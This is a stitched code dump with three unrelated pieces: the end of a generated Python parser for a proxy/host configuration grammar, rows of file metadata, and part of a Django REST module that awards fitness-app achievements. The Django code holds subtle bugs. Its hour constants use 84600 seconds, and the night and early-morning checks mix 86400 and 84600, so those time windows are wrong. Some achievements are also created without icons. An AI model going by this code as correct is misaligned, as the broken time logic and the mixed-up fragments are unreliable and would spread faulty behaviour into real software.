remaining2 -= 1
if remaining2 <= 0:
address7 = TreeNode(self._input[index4:self._offset], index4, elements3)
self._offset = self._offset
else:
address7 = FAILURE
if address7 is not FAILURE:
elements0.append(address7)
address9 = FAILURE
chunk5 = None
if self._offset < self._input_size:
chunk5 = self._input[self._offset:self._offset + 1]
if chunk5 == '.':
address9 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address9 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"."')
if address9 is not FAILURE:
elements0.append(address9)
address10 = FAILURE
remaining3, index5, elements4, address11 = 1, self._offset, [], True
while address11 is not FAILURE:
chunk6 = None
if self._offset < self._input_size:
chunk6 = self._input[self._offset:self._offset + 1]
if chunk6 is not None and Grammar.REGEX_15.search(chunk6):
address11 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address11 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\d]')
if address11 is not FAILURE:
elements4.append(address11)
remaining3 -= 1
if remaining3 <= 0:
address10 = TreeNode(self._input[index5:self._offset], index5, elements4)
self._offset = self._offset
else:
address10 = FAILURE
if address10 is not FAILURE:
elements0.append(address10)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['ipv4_host'][index0] = (address0, self._offset)
return address0
def _read_dns_host(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['dns_host'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_16.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-Z\\-\\.\\d]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['dns_host'][index0] = (address0, self._offset)
return address0
def _read_wildcard_host(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['wildcard_host'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == '*':
address0 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"*"')
self._cache['wildcard_host'][index0] = (address0, self._offset)
return address0
def _read_proxy_name(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['proxy_name'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_17.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-Z0-9\\-\\_\\.:]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['proxy_name'][index0] = (address0, self._offset)
return address0
def _read_value(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['value'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_18.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[^#\\n]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['value'][index0] = (address0, self._offset)
return address0
def _read_char(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['char'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
index2 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_19.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\n]')
self._offset = index2
if address1 is FAILURE:
address1 = TreeNode(self._input[self._offset:self._offset], self._offset)
self._offset = self._offset
else:
address1 = FAILURE
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
if self._offset < self._input_size:
address2 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('<any char>')
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['char'][index0] = (address0, self._offset)
return address0
def _read_whitespace(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['whitespace'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 0, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_20.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[ \\t]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['whitespace'][index0] = (address0, self._offset)
return address0
def _read_whitespaceplus(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['whitespaceplus'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_21.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[ \\t]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['whitespaceplus'][index0] = (address0, self._offset)
return address0
class Parser(Grammar):
def __init__(self, input, actions, types):
self._input = input
self._input_size = len(input)
self._actions = actions
self._types = types
self._offset = 0
self._cache = defaultdict(dict)
self._failure = 0
self._expected = []
def parse(self):
tree = self._read_configuration()
if tree is not FAILURE and self._offset == self._input_size:
return tree
if not self._expected:
self._failure = self._offset
self._expected.append('<EOF>')
raise ParseError(format_error(self._input, self._failure, self._expected))
def format_error(input, offset, expected):
lines, line_no, position = input.split('\n'), 0, 0
while position <= offset:
position += len(lines[line_no]) + 1
line_no += 1
message, line = 'Line ' + str(line_no) + ': expected ' + ', '.join(expected) + '\n', lines[line_no - 1]
message += line + '\n'
position -= len(line) + 1
message += ' ' * (offset - position)
return message + '^'
def parse(input, actions=None, types=None):
parser = Parser(input, actions, types)
return parser.parse()
| 45.089974
| 126
| 0.464303
| 11,722
| 140,320
| 5.317608
| 0.018256
| 0.197648
| 0.119263
| 0.090482
| 0.921968
| 0.905171
| 0.890507
| 0.88085
| 0.835047
| 0.789325
| 0
| 0.041165
| 0.462628
| 140,320
| 3,111
| 127
| 45.104468
| 0.785489
| 0.000299
| 0
| 0.816694
| 0
| 0
| 0.014329
| 0.001839
| 0.000334
| 0
| 0
| 0
| 0
| 1
| 0.02571
| false
| 0.003673
| 0.000668
| 0
| 0.074457
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d89e10609fcdfb58feafb81fd98260efa8544c38
| 46,667
|
py
|
Python
|
BPBackendDjango/BPBackendDjango/Views/achievementviews.py
|
bp-momentum/BP-backend
|
f6b4b344c2c5fae3c8bb17874771aa49a48e97ef
|
[
"MIT"
] | 3
|
2022-03-15T09:56:31.000Z
|
2022-03-15T09:56:59.000Z
|
BPBackendDjango/BPBackendDjango/Views/achievementviews.py
|
bp-momentum/BP-backend
|
f6b4b344c2c5fae3c8bb17874771aa49a48e97ef
|
[
"MIT"
] | 38
|
2022-01-16T18:26:10.000Z
|
2022-03-14T23:14:40.000Z
|
BPBackendDjango/BPBackendDjango/Views/achievementviews.py
|
bp-momentum/BP-backend
|
f6b4b344c2c5fae3c8bb17874771aa49a48e97ef
|
[
"MIT"
] | null | null | null |
from urllib import request
from rest_framework.views import APIView
from rest_framework.response import Response
from ..Helperclasses.jwttoken import JwToken
from ..Helperclasses.handlers import AchievementHandler, ErrorHandler, LanguageHandler
from ..models import Achievement, DoneExercises, Friends, User, UserAchievedAchievement, UserMedalInExercise
from .exerciseviews import MAX_POINTS
#data for achievements (hours->seconds)
NIGHT_START = 22*84600
NIGHT_END = 6*84600
EARLY_END = 8*84600
ROOT_PATH = 'https://cdn.geoscribble.de/achievements/'
class GetAchievementsView(APIView):
def get(self, request, *args, **kwargs):
#checking if it contains all arguments
check = ErrorHandler.check_arguments(['Session-Token'], request.headers, [], request.data)
if not check.get('valid'):
data = {
'success': False,
'description': 'Missing arguments',
'data': check.get('missing')
}
return Response(data)
token = JwToken.check_session_token(request.headers['Session-Token'])
#check if token is valid
if not token["valid"]:
data = {
'success': False,
'description': 'Token is not valid',
'data': {}
}
return Response(data)
info = token['info']
#only users can get their own achievements
if not User.objects.filter(username=info['username']).exists():
data = {
'success': False,
'description': 'Not a user',
'data': {}
}
return Response(data)
user:User = User.objects.get(username=info['username'])
achieved = []
nr_unachieved_hidden = 0
#create non existing achievements (#TODO add icon path)
if not Achievement.objects.filter(name='doneExercises').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'doneExercises_0.svg","1":"' + ROOT_PATH + 'doneExercises_1.svg","2":"' + ROOT_PATH + 'doneExercises_2.svg","3":"' + ROOT_PATH + 'doneExercises_3.svg"}'
Achievement.objects.create(name='doneExercises', title='{"en":"Done Exercises","de":"Abgeschlossene Übungen"}', description='{"en":"Do exercises to get/level this achievement","de":"Mache Übungen um diese Errungenschaft zu bekommen beziehungsweise hoch zu leveln"}', icon=icon_dict)
if not Achievement.objects.filter(name='havingFriends').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'friends_0.svg","1":"' + ROOT_PATH + 'friends_1.svg"}'
Achievement.objects.create(name='havingFriends', title='{"en":"A Friend!","de":"Freundschaft!"}', description='{"en":"Become friends with another user.","de":"Schließe eine Freundschaft mit einem/r anderen Spieler*in"}', icon=icon_dict)
if not Achievement.objects.filter(name='streak').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'streak_0.svg","1":"' + ROOT_PATH + 'streak_1.svg","2":"' + ROOT_PATH + 'streak_2.svg","3":"' + ROOT_PATH + 'streak_3.svg","4":"' + ROOT_PATH + 'streak_4.svg"}'
Achievement.objects.create(name='streak', title='{"en":"Streak","de":"Streak"}', description='{"en":"Reach a streak","de":"Erreiche eine Streak"}', icon=icon_dict)
if not Achievement.objects.filter(name='perfectExercise').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'perfectExercise_0.svg","1":"' + ROOT_PATH + 'perfectExercise_1.svg"}'
Achievement.objects.create(name='perfectExercise', title='{"en":"Perfect Exercise","de":"Perfekte Übung"}', description='{"en":"Complete an exercise with 100 percent","de":"Erreiche 100 Prozent bei einer Übung"}', icon=icon_dict)
if not Achievement.objects.filter(name='nightOwl').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'nightOwl_0.svg","1":"' + ROOT_PATH + 'nightOwl_1.svg"}'
Achievement.objects.create(name='nightOwl', title='{"en":"Night Owl","de":"Nachteule"}', description='{"en":"Do an exercise between 10 PM and 6 AM","de":"Mache eine Übung zwischen 10 Uhr abends und 6 Uhr morgens"}', hidden= True, icon=icon_dict)
if not Achievement.objects.filter(name='earlyBird').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'earlyBird_0.svg","1":"' + ROOT_PATH + 'earlyBird_1.svg"}'
Achievement.objects.create(name='earlyBird', title='{"en":"Early Bird","de":"Der frühe Vogel.."}', description='{"en":"Do an exercise early in the morning (between 6 AM and 8 AM)","de":"Mache eine Übung frühmorgens (zwischen 6 und 8 Uhr)"}', hidden=True, icon=icon_dict)
#iterate over all existing achievements
for achievement in Achievement.objects.all():
#do excersises
if achievement.name == 'doneExercises':
#get number of done exercises
nr_of_exs = len(DoneExercises.objects.filter(user=user.id))
#check which level is reached
if nr_of_exs >= 100:
res = AchievementHandler.upgrade_level(user, achievement, 3)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 3,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(3, achievement.icon)
})
elif nr_of_exs >= 50:
res = AchievementHandler.upgrade_level(user, achievement, 2)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 2,
'progress': str(nr_of_exs)+'/100',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(2, achievement.icon)
})
elif nr_of_exs >= 10:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': str(nr_of_exs)+'/50',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(2, achievement.icon)
})
elif not achievement.hidden:
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 0,
'progress': str(nr_of_exs)+'/10',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(0, achievement.icon)
})
else:
nr_unachieved_hidden = nr_unachieved_hidden + 1
#make a friend
elif achievement.name == 'havingFriends':
#get number of friends
nr_of_friends = len(Friends.objects.filter(friend1=user.id, accepted=True).union(Friends.objects.filter(friend2=user.id, accepted=True)))
#check which level is reached
if nr_of_friends >= 1:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
elif not achievement.hidden:
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 0,
'progress': '0/1',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(0, achievement.icon)
})
else:
nr_unachieved_hidden = nr_unachieved_hidden + 1
#streak
elif achievement.name == 'streak':
#get users streak
streak = user.streak
#check which level is reached
if streak >= 90:
res = AchievementHandler.upgrade_level(user, achievement, 4)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 4,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(4, achievement.icon)
})
elif streak >= 30:
res = AchievementHandler.upgrade_level(user, achievement, 3)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 3,
'progress': str(streak)+'/90',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(3, achievement.icon)
})
elif streak >= 7:
res = AchievementHandler.upgrade_level(user, achievement, 2)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 2,
'progress': str(streak)+'/30',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(2, achievement.icon)
})
elif streak >= 3:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': str(streak)+'/7',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
elif not achievement.hidden:
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 0,
'progress': str(streak)+'/3',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(0, achievement.icon)
})
else:
nr_unachieved_hidden = nr_unachieved_hidden + 1
#perfectExercise
elif achievement.name == 'perfectExercise':
found = False
#get all exercise
all = DoneExercises.objects.filter(user=user)
#search for exercise with MAX_POINTS
for a in all:
if a.points == MAX_POINTS:
found = True
break
#set achievement
if found:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
elif not achievement.hidden:
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 0,
'progress': '0/1',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(0, achievement.icon)
})
else:
nr_unachieved_hidden = nr_unachieved_hidden + 1
#night owl
elif achievement.name == 'nightOwl':
found = False
#get all done exercises
all = DoneExercises.objects.filter(user=user)
#check which exercises where done in the night
for a in all:
if ((a.date % 86400) > NIGHT_START) and ((a.date % 84600) < NIGHT_END):
found = True
break
#set achievement
if found:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
elif not achievement.hidden:
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 0,
'progress': '0/1',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(0, achievement.icon)
})
else:
nr_unachieved_hidden = nr_unachieved_hidden + 1
#earlyBird
elif achievement.name == 'earlyBird':
found = False
#get all exercises
all = DoneExercises.objects.filter(user=user)
#check which ones where done erly in the morning
for a in all:
if ((a.date % 86400) > NIGHT_END) and ((a.date % 84600) < EARLY_END):
found = True
break
#set achievement
if found:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
elif not achievement.hidden:
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 0,
'progress': '0/1',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(0, achievement.icon)
})
else:
nr_unachieved_hidden = nr_unachieved_hidden + 1
data = {
'success': True,
'description': 'Returning achievements',
'data': {
'achievements': achieved,
'nr_unachieved_hidden': nr_unachieved_hidden
}
}
return Response(data)
class ReloadFriendAchievementView(APIView):
def get(self, request, *args, **kwargs):
#checking if it contains all arguments
check = ErrorHandler.check_arguments(['Session-Token'], request.headers, [], request.data)
if not check.get('valid'):
data = {
'success': False,
'description': 'Missing arguments',
'data': check.get('missing')
}
return Response(data)
token = JwToken.check_session_token(request.headers['Session-Token'])
#check if token is valid
if not token["valid"]:
data = {
'success': False,
'description': 'Token is not valid',
'data': {}
}
return Response(data)
info = token['info']
#only users can get their own achievements
if not User.objects.filter(username=info['username']).exists():
data = {
'success': False,
'description': 'Not a user',
'data': {}
}
return Response(data)
user:User = User.objects.get(username=info['username'])
#can not be achieved
if not Achievement.objects.filter(name='havingFriends').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'friends_0.svg","1":"' + ROOT_PATH + 'friends_1.svg"}'
Achievement.objects.create(name='havingFriends', title='{"en":"A Friend!","de":"Freundschaft!"}', description='{"en": "Become friends with another user.", "de": "Sei mit einem Spieler befreundet"}', icon=icon_dict)
achievement:Achievement = Achievement.objects.get(name='havingFriends')
#already achieved
if UserAchievedAchievement.objects.filter(achievement=achievement, user=user).exists():
data = {
'success': True,
'description': 'Not achieved',
'data': {}
}
return Response(data)
#get number of friends
nr_of_friends = len(Friends.objects.filter(friend1=user.id, accepted=True).union(Friends.objects.filter(friend2=user.id, accepted=True)))
#check which level is reached
if nr_of_friends >= 1:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
data = {
'success': True,
'description': 'Achieved',
'data': {
'achievements': {
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
}
}
}
else:
data = {
'success': True,
'description': 'Not achieved',
'data': {}
}
return Response(data)
class ReloadAfterExerciseView(APIView):
def get(self, request, *args, **kwargs):
#checking if it contains all arguments
check = ErrorHandler.check_arguments(['Session-Token'], request.headers, [], request.data)
if not check.get('valid'):
data = {
'success': False,
'description': 'Missing arguments',
'data': check.get('missing')
}
return Response(data)
token = JwToken.check_session_token(request.headers['Session-Token'])
#check if token is valid
if not token["valid"]:
data = {
'success': False,
'description': 'Token is not valid',
'data': {}
}
return Response(data)
info = token['info']
#only users can get their own achievements
if not User.objects.filter(username=info['username']).exists():
data = {
'success': False,
'description': 'Not a user',
'data': {}
}
return Response(data)
user:User = User.objects.get(username=info['username'])
achieved = []
#do excersises
if not Achievement.objects.filter(name='doneExercises').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'doneExercises_0.svg","1":"' + ROOT_PATH + 'doneExercises_1.svg","2":"' + ROOT_PATH + 'doneExercises_2.svg","3":"' + ROOT_PATH + 'doneExercises_3.svg"}'
Achievement.objects.create(name='doneExercises', title='{"en":"Done Exercises","de":"Abgeschlossene Übungen"}', description='{"en": "Do exercises to get/level this achievement", "de": "Mache Übungen um diese Errungenschaft zu bekommen beziehungsweise hoch zu leveln"}')
achievement:Achievement = Achievement.objects.get(name='doneExercises')
#get number of done exercises
nr_of_exs = len(DoneExercises.objects.filter(user=user.id))
#already achieved
if not UserAchievedAchievement.objects.filter(achievement=achievement, user=user, level=3).exists():
#check which level is reached
if nr_of_exs >= 100:
res = AchievementHandler.upgrade_level(user, achievement, 3)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'level upgraded':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 3,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(3, achievement.icon)
})
elif nr_of_exs >= 50:
res = AchievementHandler.upgrade_level(user, achievement, 2)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'level upgraded':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 2,
'progress': str(nr_of_exs)+'/100',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(2, achievement.icon)
})
elif nr_of_exs >= 10:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'user achieved achievement':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': str(nr_of_exs)+'/50',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
#perfectExercise
if not Achievement.objects.filter(name='perfectExercise').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'perfectExercise_0.svg","1":"' + ROOT_PATH + 'perfectExercise_1.svg"}'
Achievement.objects.create(name='perfectExercise', title='{"en":"Perfect Exercise","de":"Perfekte Übung"}', description='{"en": "Complete an exercise with 100 percent", "de": "Erreiche 100 Prozent bei einer Übung"}')
achievement = Achievement.objects.get(name='perfectExercise')
#check if achievement already achieved
if not UserAchievedAchievement.objects.filter(achievement=achievement, user=user).exists():
found = False
#get all exercise
all = DoneExercises.objects.filter(user=user)
#search for exercise with MAX_POINTS
for a in all:
if a.points == MAX_POINTS:
found = True
break
#set achievement
if found:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'user achieved achievement':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
#night owl
if not Achievement.objects.filter(name='nightOwl').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'nightOwl_0.svg","1":"' + ROOT_PATH + 'nightOwl_1.svg"}'
Achievement.objects.create(name='nightOwl', title='{"en":"Night Owl","de":"Nachteule"}', description='{"en": "Do an exercise between 10 PM and 6 AM", "de": "Mache eine Übung zwischen 10 Uhr abends und 6 Uhr morgens"}', hidden= True)
achievement = Achievement.objects.get(name='nightOwl')
#check if achievement already achieved
